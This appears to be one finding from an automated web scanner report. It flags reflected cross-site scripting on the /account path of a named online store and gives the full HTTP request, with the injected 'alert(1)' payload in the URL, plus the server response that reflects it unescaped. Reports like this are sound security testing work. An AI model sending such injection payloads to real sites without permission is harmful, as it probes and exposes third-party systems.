1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | https://www.storeson |
Path: | /account |
GET /db6c6%0aalert(1)/ Host: www.storesonlinepro.com Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sitecookie=044a4b21b |
HTTP/1.1 404 404 - No recommend for secure page, request: https://www.storeson alert(1)//b49fe1cddbf Date: Fri, 10 Dec 2010 19:08:08 GMT X-Matrix-Server: smith20 Set-Cookie: sitecookie=bf9f9e338 Connection: keep-alive Content-Type: text/plain; charset=utf-8 Content-Length: 108 404 404 - No recommend for secure page, request: https://www.storeson alert(1)//b49fe1cddbf |